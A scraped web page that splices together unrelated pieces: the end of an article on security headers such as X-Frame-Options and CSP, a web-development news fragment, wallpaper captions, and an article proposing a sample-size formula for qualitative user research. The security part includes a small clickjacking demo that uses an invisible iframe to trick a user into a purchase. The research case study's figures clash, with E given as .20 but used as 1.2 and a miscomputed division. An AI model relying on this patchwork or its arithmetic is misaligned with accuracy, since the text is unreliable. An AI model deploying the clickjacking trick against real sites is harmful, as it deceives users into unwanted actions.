Here’s how you would configure this response header in Node.js:
function requestHandler(req, res) { res.setHeader('X-XSS-Protection','1;mode=block'); }
An iframe (or HTML inline frame element, if you want to be more formal) is a DOM element that allows a web app to be nested within a parent web app. This powerful element enables some important web use cases, such as embedding third-party content into web apps, but it also has significant drawbacks, such as not being SEO-friendly and not playing nice with browser navigation — the list goes on.
One of the caveats of iframes is that it makes clickjacking easier. Clickjacking is an attack that tricks the user into clicking something different than what they think they’re clicking. To understand a simple implementation of clickjacking, consider the HTML markup below, which tries to trick the user into buying a toaster when they think they are clicking to win a prize!
<html> <body> <button class='some-class'>Win a Prize!</button> <iframe class='some-class' style='opacity: 0;’ src='http://buy.com?buy=toaster'></iframe> </body> </html>
Clickjacking has many malicious applications, such as tricking the user into confirming a Facebook like, purchasing an item online and even submitting confidential information. Malicious web apps can leverage iframes for clickjacking by embedding a legitimate web app inside their malicious web app, rendering the iframe invisible with the opacity: 0 CSS rule, and placing the iframe’s click target directly on top of an innocent-looking button rendered by the malicious web app. A user who clicks the innocent-looking button will trigger a click on the embedded web app — without at all knowing the effect of their click.
An effective way to block this attack is by restricting your web app from being framed. X-Frame-Options, specified in RFC 703411, is designed to do exactly that! This header instructs the browser to apply limitations on whether your web app can be embedded within another web page, thus blocking a malicious web page from tricking users into invoking various transactions on your web app. You can either block framing completely using the DENY directive, whitelist specific domains using the ALLOW-FROM directive, or whitelist only the web app’s origin using the SAMEORIGIN directive.
My recommendation is to use the SAMEORIGIN directive, which enables iframes to be leveraged for apps on the same domain — which may be useful at times — and which maintains security. This recommended header looks like this:
X-Frame-Options: SAMEORIGIN
Here’s an example of a configuration of this header to enable framing on the same origin in Node.js:
function requestHandler(req, res) { res.setHeader('X-Frame-Options','SAMEORIGIN'); }
As we’ve noted earlier, you can add in-depth security to your web app by enabling the browser’s XSS filter. However, note that this mechanism is limited, is not supported by all browsers (Firefox, for instance, does not have an XSS filter) and relies on pattern-matching techniques that can be tricked.
Another layer of in-depth protection against XSS and other attacks can be achieved by explicitly whitelisting trusted sources and operations — which is what Content Security Policy (CSP) enables web app developers to do.
CSP is a W3C specification12 that defines a powerful browser-based security mechanism, enabling granular control over resource-loading and script execution in a web app. With CSP, you can whitelist specific domains for operations such as script-loading, AJAX calls, image-loading and style sheet-loading. You can enable or disable inline scripts or dynamic scripts (the notorious eval) and control framing by whitelisting specific domains for framing. Another cool feature of CSP is that it allows you to configure a real-time reporting target, so that you can monitor your app in real time for CSP blocking operations.
This explicit whitelisting of resource loading and execution provides in-depth security that in many cases will fend off attacks. For example, by using CSP to disallow inline scripts, you can fend off many of the reflective XSS attack variants that rely on injecting inline scripts into the DOM.
CSP is a relatively complex header, with a lot of directives, and I won’t go into the details of the various directives. HTML5 Rocks has a great tutorial13 that provides an overview of CSP, and I highly recommend reading it and learning how to use CSP in your web app.
Here’s a simple example of a CSP configuration to allow script-loading from the app’s origin only and to block dynamic script execution (eval) and inline scripts (as usual, on Node.js):
function requestHandler(req, res) { res.setHeader('Content-Security-Policy',"script-src 'self'"); }
In an effort to make the user experience as seamless as possible, many browsers have implemented a feature called content-type sniffing, or MIME sniffing. This feature enables the browser to detect the type of a resource provided as part of an HTTP response by “sniffing” the actual resource bits, regardless of the resource type declared through the Content-Type response header. While this feature is indeed useful in some cases, it introduces a vulnerability and an attack vector known as a MIME confusion attack. A MIME-sniffing vulnerability enables an attacker to inject a malicious resource, such as a malicious executable script, masquerading as an innocent resource, such as an image. With MIME sniffing, the browser will ignore the declared image content type, and instead of rendering an image will execute the malicious script.
Luckily, the X-Content-Type-Options response header mitigates this vulnerability! This header, introduced in Internet Explorer 8 back in 2008 and currently supported by most major browsers (Safari is the only major browser not to support it), instructs the browser not to use sniffing when handling fetched resources. Because X-Content-Type-Options was only formally specified as part of the “Fetch” specification14, the actual implementation varies across browsers; some (Internet Explorer and Edge) completely avoid MIME sniffing, whereas others (Firefox) still MIME sniff but rather block executable resources (JavaScript and CSS) when an inconsistency between declared and actual types is detected. The latter is in line with the latest Fetch specification.
X-Content-Type-Options is a simple response header, with only one directive: nosniff. This header looks like this: X-Content-Type-Options: nosniff. Here’s an example of a configuration of the header:
function requestHandler(req, res) { res.setHeader('X-Content-Type-Options','nosniff'); }
In this article, we have seen how to leverage HTTP headers to reinforce the security of your web app, to fend off attacks and to mitigate vulnerabilities.
Cache-Control header.Strict-Transport-Security header, and add your domain to Chrome’s preload list.X-XSS-Protection header.X-Frame-Options header.Content-Security-Policy to whitelist specific sources and endpoints.X-Content-Type-Options header.Remember that for the web to be truly awesome and engaging, it has to be secure. Leverage HTTP headers to build a more secure web!
(Disclaimer: The content of this post is my own and doesn’t represent my past or current employers in any way whatsoever.)
Front page image credits: Pexels.com15.
(da, yk, al, il)
Iosevka is a slender monospace sans-serif and slab-serif typeface inspired by Pragmata Pro, M+ and PF DIN Mono, designed to be the ideal font for programming.
What a busy week! To stay on top of things, let’s review what happened in the web development world the last few days — from browser vendors pushing new updates and building new JavaScript guidelines and security standards to why we as web professionals need to review our professional pride. How can we properly revoke certificates in browsers, for example? And how can we build accessibility into a style guide? Let’s take a look.
fetch(), IndexedDB2.0, Custom Elements, Form Validation, Media Capture, and much more. You can read more about the new features and how to use them5 in detail on the WebKit blog.alert(), confirm(), and prompt() methods in JavaScript anymore6, and, in the future, they might even deprecate sites that still use them. The suggestion is to use the Web Notification API instead, in the hope that its asynchronous nature will prevent it from being misused against users. As a nice side effect, using the API will also speed up browser performance significantly.
16And with that, I’ll close for this week. If you like what I write each week, please support me with a donation24 or share this resource with other people. You can learn more about the costs of the project here25. It’s available via email, RSS and online.
— Anselm
“Prank your friends with caution.” — Designed by foodpanda Singapore381 from Singapore.
382“I believe that Earth is something that we take for granted. We need to start taking care of our home, after all if the Earth is not OK, we won’t be.” — Designed by Maria Keller406 from Mexico.
407“I designed this wallpaper combining both the sunny and the rainy weather. April, here in Italy, is synonymous with flowers and fun, and we can enjoy the first hot days after winter; but it’s also damn rainy! So I just brought all together and made my ‘Funshower’, a funny pun!” — Designed by Stefano Marchini459 from Italy.
460“April the 2nd is Hans Christian Andersen’s birthday. Hans is most famous for his magical fairy tales, such as ‘The Little Mermaid’, ‘The Princess and the Pea’ and ‘Thumbelina’. I always loved the tale of Thumbelina, so I created this wallpaper for Hans!” — Designed by Safia Begum496 from the United Kingdom.
497“Design is a community. Each one of these creators found their way into my consciousness as idea-catalysts. This is my way of thanking them and so I’m excited to bring this set to the greater design community. However these are used, my aim is to pay tribute to these sixteen and drive baby-steppers to great inspirers.” — Designed by Juliane Bone517 from California.
518“Every year, Washington DC’s Kite Festival is a welcome sight in spring. The National Mall is transformed by colorful serpents, butterflies, and homemade winged crafts and by the families who come from across the city to enjoy their aerial stunts over a picnic at the base of the Washington Monument.” — Designed by The Hannon Group562 from Washington, DC.
563“The most beautiful flowers are in bloom around my neighborhood, and I get this little tune stuck in my head every time I go for a walk. I thought it would be perfect for a bright watercolor-styled design!” — Designed by Alyson Sherrard585 from Pensacola, Florida.
586“This bad bunny is just waiting for Easter. :)” — Designed by Izabela600 from Poland.
601“Sometimes when you are out and about you see something that captures your attention. It does not have to be anything spectacular, but you know that you want to remember it at that specific point in time. No matter how busy you are, stop and see the flowers.” — Designed by Kris G613 from the USA.
614“‘When all the world appears to be in a tumult, and nature itself is feeling the assault of climate change, the seasons retain their essential rhythm. Yes, fall gives us a premonition of winter, but then, winter, will be forced to relent, once again, to the new beginnings of soft greens, longer light, and the sweet air of spring.‘ (Madeleine M. Kunin)” — Designed by Dipanjan Karmakar632 from India.
633“My calendar is an illustration of the old proverb ‘April showers bring May flowers’. I always look forward to the end of that transition.” — Designed by Caitey Kennedy651 from the United States.
652“A smiling earth is how I wish to think of my home planet. I like to believe that whenever a plantling gets its root deep into the soil, or when a dolphin jumps out of the water, the earth must be getting tickled, bringing a wide grin on its face. So this World Earth Day, let’s promote afforestation, protect the wildlife and its habitat. Let’s make the earth smile forever.” — Designed by Acodez IT Solutions674 from India.
675“When I think of spring, I think of little chickens playing in the field. They always look so happy. I just bought 3 new little chickens, and they are super cute. So enjoy this wallpaper, and enjoy spring.” — Designed by Melissa Bogemans719 from Belgium.
720“Spring revives nature, so I designed a wallpaper with a cute little fairy who awakens plants.” — Designed by Hushlenko Antonina762 from Ukraine.
763“April showers bring May flowers, and what better way to enjoy rainy weather than to get stuck in a surreal book, in a comfy nook, with a kettle of tea!” — Designed by Brooke Coraldi807 from the United States.
808“It is time for more colour in our life! After this cold and dark winter, we have to paint our minds or better our walls. Flower power everywhere!” — Designed by Sabrina Lobien848144 from Germany.
849Designed by Doud – Elise Vanoorbeek861 from Belgium.
862“April is magical. April is musical. April is mesmerizing. April is the International Month of Guitar. Let this calendar make it special.” — Designed by ColorMean Creative Studio884 from Dubai, United Arab Emirates
885“Spring is a great time to photograph nature because everything is green and full of new life. Like spring, a sunrise is also the start of something new.” — Designed by Marc Andre929 from the United States.
930Please note that we respect and carefully consider the ideas and motivation behind each and every artist’s work. This is why we give all artists the full freedom to explore their creativity and express emotions and experience throughout their works. This is also why the themes of the wallpapers weren’t anyhow influenced by us, but rather designed from scratch by the artists themselves.
A big thank you to all designers for their participation. Join in next month974!
What’s your favorite theme or wallpaper for this month? Please let us know in the comment section below.
Jen is presenting her research report to a client, who runs an e-commerce website. She conducted interviews with 12 potential users. Her goal was to understand the conditions under which users choose to shop online versus in store. The client asks Jen why they should trust her research when she has spoken to only 12 people. Jen explains her process to the client. She shares how she determined the sample size and collected and analyzed her data through the lens of data saturation. The client feels comfortable with the explanation. She asks Jen to continue the presentation.
Researchers must justify the sample size of their studies. Clients, colleagues and investors want to know they can trust a study’s recommendations. They base a lot of trust on sample population and size. Did you talk to the right people? Did you talk to the right number of people? Researchers must also know how to make the most of the data they collect. Your sample size won’t matter if you haven’t asked good questions and done thorough analysis.
Quantitative research methods (such as surveys) come with effective statistical techniques for determining a sample size. This is based on the population size you are studying and the level of confidence desired in the results. Many stakeholders are familiar with quantitative methods and terms such as “statistical significance.” These stakeholders tend to carry this understanding across all research projects and are, therefore, expecting to hear similar terms and hear of similar sample sizes across research projects.
Qualitative researchers need to set the context for stakeholders. Qualitative research methods (such as interviews) currently have no similar commonly accepted technique. Yet, there are steps you should take to ensure you have collected and analyzed the right amount of data.
In this article, I will propose a formula for determining qualitative sample sizes in user research. I’ll also discuss how to collect and analyze data in order to achieve “data saturation.” Finally, I will provide a case study highlighting the concepts explored in this article.
As researchers, or members of teams that work with researchers, we need to understand and convey to others why we’ve chosen a particular sample size.
I’ll give you the bad news first. We don’t have an agreed-upon formula to determine an exact sample size for qualitative research. Anyone who says otherwise is wrong. We do have some suggested guidelines based on precedent in academic studies. We often use smaller sample sizes for qualitative research. I have been in projects that include interviews with fewer than 10 people. I have also been in projects in which we’ve interviewed dozens of people. Jakob Nielson suggests a sample size of five for usability testing. However, he adds a number of qualifiers, and the suggestion is limited to usability testing studies, not exploratory interviews, contextual inquiry or other qualitative methods commonly used in the generative stages of research.
So, how do we determine a qualitative sample size? We need to understand the purpose of our research. We conduct qualitative research to gain a deep understanding of something (an event, issue, problem or solution). This is different from quantitative research, whose purpose is to quantify, or measure the presence of, something. Quantification usually provides a shallow yet broad view of an issue.
You can determine your qualitative research sample size on a rolling basis. Or you can state the sample size up front.
If you are an academic researcher in a multi-year project, or you have a large budget and generous timeline, you can suggest a rolling sample size. You’d collect data from a set number of participants. At the same time, you’d analyze the data and determine whether you need to collect more data. This approach leads to large amounts of data and greater certainty in your findings. You will have a deep and broad view of the issue that you are designing to address. You would stop collecting data because you have exhausted the need to continue collecting data. You will likely end up with a larger sample size.
Most clients or projects require you to state a predetermined sample size. Reality, in the form of budget and time, often dictates sample sizes. You won’t have time to interview 50 people and do a thorough analysis of the data if your project is expected to move from research to design to development over an 8- to 10-week period. A sample size of 10 to 12 is probably more realistic for a project like this. You will probably have two weeks to get from recruitment to analysis. You would stop because you have exhausted the resources for your study. Yet our clients and peers want us to make impactful recommendations from this data.
Your use of a rolling or predetermined sample size will determine how you speak about why you stopped collecting data. For a rolling sample, you could say, “We stopped collecting data after analysis found it would no longer prove valuable to collect more data.” If you use a predetermined sample size, you could say, “We stopped collecting data after we interviewed (or observed, etc.) the predetermined number we agreed upon. We fully analyzed the data collected.”
We can still maintain a rigorous process using a predetermined sample size. Our findings are still valid. Data saturation helps to ensure this. You need to complete three steps in order to claim you’ve done due diligence in determining a sample size and reaching data saturation when using a predetermined sample:
I will cover each step in detail in the following sections.
Donna Bonde from Research by Design, a marketing research firm, provides research-based guidelines8 (Qualitative market research: When enough is enough) to help determine the size of a qualitative research sample up front. Bonde reviewed the work of numerous market research studies to determine the consistent key factors for sample sizes across the studies. Bonde considers the guidelines not to be a formula, but rather to be factors affecting qualitative sample sizes. The guidelines are meant for marketing research, so I’ve modified them to suit the needs of the user researcher. I have also organized the relevant factors into a formula. This will help you to determine and justify a sample size and to increase the likelihood of reaching saturation.
The formula for determining a sample size, based on my interpretation of Research by Design’s guidelines, is: scope × characteristics ÷ expertise + or - resources.
Here are descriptions and examples for the four factors of the formula for determining your qualitative sample size.
You need to consider what you are trying to accomplish. This is the most important factor when considering sample size. Are you looking to design a solution from scratch? Or are you looking to identify small wins to improve your current product’s usability? You would maximize the number of research participants if you were looking to inform the creation of a new experience. You could include fewer participants if you are trying to identify potential difficulties in the checkout workflow of your application.
Numerically, the scope can be anywhere from 1 to infinity. A zero would designate no research, which violates principles of UX design. You will multiply the scope by each user type × 3 in the next step. So, including a number greater than 1 will drastically increase your sample size. Scope is all about how you want to apply your results. I recommend using the following values for filling in scope:
9I’ve given you guidelines for scope that will make sure your sample size is comparable to what some academic researchers suggest. Scholar John Creswell suggests12 guidelines ranging from as few as five for a case study (for example, your existing product) to more than 20 for developing a new theory (for example, generalizing beyond your product). We won’t stop with Creswell’s recommendations because you will create a stronger argument and demonstrate better understanding when you show that you’ve used a formula to determine your sample size. Also, scholars are nowhere near agreement on specific sample sizes to use, as Creswell suggests.
You will increase your sample size as the diversity of your population increases. You will want multiple representatives of each persona or user type you are designing for. I recommend a minimum of three participants per user type. This allows for a deeper exploration of the experience each user type might have.
Let’s say you are designing an application that enables manufacturing companies to input and track the ordering and shipment of supplies from warehouses to factories. You would want to interview many people involved in this process: warehouse floor workers, office staff, procurement staff from the warehouse and factory, managers and more. If you were looking only to redesign the interface of the read-only tracking function of this app, then you might only need to interview people who look at the tracking page of the application: warehouse and factory office workers.
Numerically, C = P × 3, where P equals the number of unique user types you’ve identified. Three user types would give you C = 9.
Experienced researchers can do more with a smaller sample size than less experienced researchers. Qualitative researchers insert themselves into the data-collection process differently than quantitative researchers. You can’t change your line of questioning in a survey based on an unforeseen topic becoming relevant. You can adjust your line of questioning based on the real-time feedback you get from a qualitative research participant. Experienced researchers will generate more and better-quality data from each participant. An experienced researcher knows how and when to dig deeper based on a participant’s response. An experienced researcher will bring a history of experiences to add insight to the data analysis.
Numerically, expertise (E) could range from 1 to infinity. Realistically, the range should be from 1 to 2. For example, a researcher with no experience should have a 1 because they will need the full size of the sample, and they would gain experience as the project moves forward. Using a 2 would halve your sample size (at that point in the formula), which is drastic as well. I’d suggest adding tenths (.10) based on 5-year increments; for example, a researcher with 5 years of experience would give you E = 1.10.
13An unfortunate truth, you will have to account for budget and time constraints when determining a sample size. You will need to increase either your timeline or the number of researchers on a project, as you increase the size of your sample. Most clients or projects will require you to identify a set number of research participants. Time and money will affect this number. You will need to budget time for recruiting participants and analyzing data. You will also need to consider the needs of design and development for completing those duties. Peers will not value your research findings if the findings come in after everyone else has moved forward. I recommend scaling down a sample size to get the data on time, rather than hold on to a sample size that causes your research to drag on past when your team needs the findings.
Numerically, resources will be a number from N (i.e. the desired sample size) - 1 or more to + 1 or more. You’ll determine resources based on the cost and time you will spend recruiting participants, conducting research and analyzing data. You might have specific numbers based on previous efforts. For example, you might know it will cost around $15,000 to use a recruitment service, to rent a facility for two days and to pay 15 participants for one-hour interviews. You also know the recruiting service will ask for up to three weeks to find the sample you need, depending on the complexity of the study. On the other hand, you might be able to recruit 15 participants at no extra cost if you ask your client to find existing users, but that might add weeks to the process if you can’t find them quickly or if potential participants aren’t immediately available.
You will need to budget for the time and resources necessary to get the sample you require, or you will need to reduce your sample accordingly. Because this is a fact of life, I recommend being up front about it. Say to your boss or client, “We want to speak to 15 users for this project. But our budget and timeline will only allow for 10. Please keep that in mind when we present our findings.”
Let’s say you want to figure out how many participants to include in a study that is assessing the need to create an area for customer-service staff members of a mid-sized client to access the applications they use at work (a portal). Your client states that there are three basic user types: floor staff, managers and administrators. You have a healthy budget and a total of 10 weeks to go from research to presentation of design concepts for the portal and a working prototype of a few workflows within the portal. You have been a researcher for 11 years.
Your formula for determining a sample size would be:
scope (S) large scope - creating a new portal (S) = 2;characteristics (C) - 3 user types (C) = 9;expertise (E) - 11 years (E)= 1.20;resources (R) - fine for this study (R) = 0;our formula is ((SxC)/E) + R;((2x9)/1.2) + 0 = 15 participants for this study.Data saturation is a concept from academic research. Academics do not agree on the definition of saturation. The basic idea is to get enough data to support the decisions you make, and to exhaust your analysis of that data. You need to get enough data in order to create meaningful themes and recommendations from your exhaustive analysis. Reaching data saturation depends on the particular methods you are using to collect data. Interviews are often cited as the best method to ensure you reach data saturation.
Researchers do not often use sample size alone as the criterion for assessing saturation. I support a two-pronged definition: saturation of data collection and saturation of data analysis. You need to do both to achieve data saturation in a study. You also need to do both, data collection and analysis, simultaneously to know you’ve achieved saturation before the study concludes.
You would collect enough meaningful data to identify key themes and make recommendations. Once you have coded your data and identified key themes, do you have actionable takeaways? If so, you should feel comfortable with what you have. If you haven’t identified meaningful themes or if the participants have all had many different experiences, then collect additional data. Or if something unique came up in only one interview, you might add more focused interviews to further explore that concept.
You would achieve saturation of data collection in part by collecting rich data. Rich data is data that provides a depth of insight into the problem you are investigating. Rich data is an output of good questions, good follow-up prompts and an experienced researcher. You would collect rich data based on the quality of the data collection, not the sample size. It’s possible to get better information from a sample of three people whom you spend an hour each interviewing than you would from six people whom you only spend 30 minutes interviewing. You need to hone your questions in order to collect rich data. You would accomplish this when you create a questionnaire and iterate based on feedback from others, as well as from practice runs prior to data collection.
You might want to limit your study to specific types of participants. This could reduce the need for a larger sample to reach saturation of data collection.
For example, let’s say you want to understand the situation of someone who has switched banks recently.
Have you identified key characteristics that might differentiate members of this group? Perhaps someone who recently moved and switched banks has had a drastically different experience than someone whose bank charged them too many fees and made them angry.
Have you talked to multiple people who fit each user type? Did their experiences suggest a commonality between the user types? Or do you need to look deeper at one or both user types?
If you interview only one person who fits the description of a user who has recently moved and switched banks, then you’d need to increase your sample and talk to more people of that user type. Perhaps you could make an argument that only one of these user types is relevant to your current project. This would allow you to focus on one of the user types and reduce the number of participants needed to reach saturation of data collection.
Let’s say you’ve determined that you’ll need a sample size of 15 people for your banking study.
You’ve created your questionnaire and focused on exploring how your participants have experienced banking, both in person and online, over the past five years. You spend an hour interviewing each participant, thoroughly exhausting your lines of questioning and follow-up prompts.
You collect and analyze the data simultaneously. After 12 interviews, you find the following key themes have emerged from your data:
Your team meets to discuss the themes and how to apply them to your work. You decide as a team to create a concept for a web-based onboarding experience that facilitates transparency into how the bank applies fees to accounts, that addresses how the client allows users to share personal banking experiences and to invite others, and that covers key aspects of onboarding that your participants said were lacking from their account-opening experiences.
You have reached one of the two requirements for saturation: You have collected enough meaningful data to identify key themes and make recommendations. You have an actionable takeaway from your findings: to create an onboarding experience that highlights transparency and personal connections. And it only took you 12 participants to get there. You finish the last three interviews to validate what you’ve heard and to stockpile more data for the next component of saturation.
You thoroughly analyze the data you have collected to reach saturation of data analysis. This means you’ve done your due diligence in analyzing the data you’ve collected, whether the sample size is 1 or 100. You can analyze qualitative data in many ways. Some of the ways depend on the exact method of data collection you’ve followed.
You will need to code all of your data. You can create codes inductively (based on what the data tell you) or deductively (predetermined codes). You are trying to identify meaningful themes and points made in the data. You saturate data analysis when you have coded all data and identified themes supported by the coded data. This is also where the researcher’s experience comes into play. Experience will help you to identify meaningful codes and themes more quickly and to translate them into actionable recommendations.
16Going back to our banking example, you’ve presented your findings and proposed an onboarding experience to your client. The client likes the idea, but also suggests there might be more information to uncover about the lack of transparency. They suggest you find a few more people to interview about this theme specifically.
You ask another researcher to review your data before you agree to interview more people. This researcher finds variation in the transparency-themed quotes that the current codes don’t cover: Some users think banks lack transparency around fees and services. Others mention that banks lack transparency in how client information is stored and used. Initially, you only coded a lack of transparency in fee structures. The additional pair of eyes reviewing your data enables you to reach saturation of analysis. Your designers begin to account for this variation of transparency in the onboarding experience and throughout. They highlight bank privacy and data-security policies.
You have a discussion with your client and suggest not moving forward with additional interviews. You were able to reach saturation of data analysis once you reviewed the data and applied additional codes. You don’t need additional interviews.
Let’s run through a case study covering the concepts presented in this article.
Suppose we are working with a client to conceptualize a redesign of their clinical data-management application. Researchers use clinical data-management applications to collect and store data from clinical trials. Clinical trials are studies that test the effectiveness of new medical treatments. The client wants us to identify areas to improve the design of their product and to increase use and reliability. We will conduct interviews up front to inform our design concepts.
We’ll request 12 interview participants based on the formula in this article. Below is how we’ve determined the value of each variable in the formula.
Scope: We are tasked with providing research-informed design concepts for an existing product. This project does not have a large scope. We are not inventing a new way to collect clinical data, but rather are improving an existing tool. The smaller scope justifies a smaller sample size.
S = 1C= 3 × 3 user typesC = 9Expertise: Let’s say our lead researcher has 10 years of research experience. Our team has experience with the type of project we are completing. We know exactly how much data we need and what to expect from interviewing 12 people.
E = .20At this point, our formula is ((1 × 3) ÷ 1.2) = 7.5 participants, before factoring in resources. We’ll round up to 8 participants.
Resources: We know the budget and time resources available. We know from past projects that we’ll have enough resources to conduct up to 15 interviews. We could divert more resources to design if we go with fewer than 15 participants. Adding 4 participants to our current number (8) won’t tax our resources and would allow us to speak to 4 of each user type.
R = 4We recommend 12 research participants to our client, based on the formula for determining the proposed sample size:
Scope (S) - small scope - updating an existing product (S) = 1Characteristics (C) - 3 user types (C) = 9Expertise (E) - 10 years (E)= 1.20Resources (R) - fine for up to 15 total participants (R) = +4((SxC)/E) + R;((1x9)/1.2) + 4 = 12 participants for this study.We’ll set up a spreadsheet to manage the data we collect. Let’s set up the spreadsheet to first examine the data, with participants in rows and the questions in columns (table 1):
| What are some challenges with the system? | Question 2 | Question 3 | Question 4 | |
|---|---|---|---|---|
| Participant 1 | Protocol deviations can get lost or be misleading because they are not always clearly displayed. This would give too much control to the study coordinator role; they would be able to change too much. A tremendous amount of cleaning needs to get done. |
Next, we add a second tab to the spreadsheet and created codes based on what emerged from the data (table 2):
| Code: Issues with study protocol (deviations) | Code: Unreliable data | Code 3 | Code 4 | |
|---|---|---|---|---|
| Participant 1 | There isn’t consistency looking at the same data. It gives too much control to the study coordinator role. They would be able to change too much. | A tremendous amount of cleaning needs to get done. |
Next, we review the data to identify relevant themes (table 3):
| Theme: “trust in the product” | Theme 2 | Theme 3 | Theme 4 | |
|---|---|---|---|---|
| Coded quote and participant | “I’m not sure if we are compliant.” – Participant 1 | |||
| Quote and participant | “It’s very configurable, but it’s configurable to the point that it’s unreliable and not predictable.” – Participant 2 |
Trust emerges as a theme almost immediately. Nearly every participant mentions a lack of trust in the system. The study designers tell us they don’t trust the lack of structure in creating a study; the clinical data collectors tell us they don’t trust the novice study designers; and the managers tell us they don’t trust the study’s design, the accuracy of the data collectors or the ability of the system to store and upload data with 100% accuracy.
Our design recommendations for the concepts focus on interactions and functionality to increase trust in the product.
Qualitative user researchers must support our reason for choosing a sample size. We may not be academic researchers, but we should strive for standards in how we determine sample sizes. Standards increase the rigor and integrity of our studies. I’ve provided a formula for helping to justify sample sizes.
We must also make sure to achieve data saturation. We do this by suggesting a reasonable sample size, by collecting data using sound questions and good interviewing techniques, and by thoroughly analyzing the data. Clients and colleagues will appreciate the transparency we provide when we show how we’ve determined our sample size and analyzed our data.
I’ve covered a case study demonstrating use of the formula I’ve proposed for determining qualitative research sample sizes. I’ve also discussed how to analyze data in order to reach data saturation.
We must continue moving forward the conversation on determining qualitative sample sizes. Please share other ideas you’ve encountered or used to determine sample sizes. What standards have you given clients or colleagues when asked how you’ve determined a sample size?
(cc, yk, al, il)
AcrossTabs * Sonnet * ReactXP * Colormind * Flint OS * Color Tool * The Art of Naming * Vue.js 2.2 Cheat Sheet * Moon…
A repo of useful React patterns, techniques, tips and tricks.